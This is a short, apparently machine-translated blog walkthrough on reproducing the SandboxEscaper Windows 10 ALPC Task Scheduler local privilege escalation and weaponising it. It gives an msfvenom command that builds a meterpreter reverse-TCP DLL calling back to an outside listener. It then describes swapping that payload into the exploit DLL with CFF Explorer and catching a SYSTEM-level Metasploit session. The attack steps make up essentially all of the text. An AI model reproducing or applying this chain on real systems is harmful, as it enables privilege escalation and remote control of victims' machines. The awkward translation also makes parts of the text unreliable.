Windows 10 loopholes replay and weaponry utilization

Project address: https://github.com/SandboxEscaper/randomrepo

Download address of related tools:

Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer

CFF Explorer:https://ntcore.com/?page_id=388

Reappearance:

Open a notepad and Process Explorer

The PID number for notepad is 1944.

Next, exploit loopholes.

The 1944 of the picture above is the PID of the Notepad. Enter.

spoolsv.exe There are more than one process tree.

This process tree will not be kill.

Right click -> Kill Process Tree

The current process is the System process.

Weaponry utilization

Generate a DLL file

┌─[root@sch01ar]─[~]
└──╼ #msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.220.160 lport=4444 -f dll -o sch01ar.dll

Bring the generated DLL file to Windows 10.

Using CFF Explorer to open the original ALPC-TaskSched-LPE.dll

Point Resource Editor

Right click Replace Resource

Then select sch01ar.dll.

Preservation

Whether to overwrite the original file, the choice is

Open MSF

┌─[root@sch01ar]─[~]
└──╼ #msfconsole

Configure related options and turn on monitoring.

Switch back to Windows 10

A window will pop up.

msf Return session

msf exploit(handler) > sessions -i 1

system Jurisdiction

Leave a Reply

Your email address will not be published. Required fields are marked *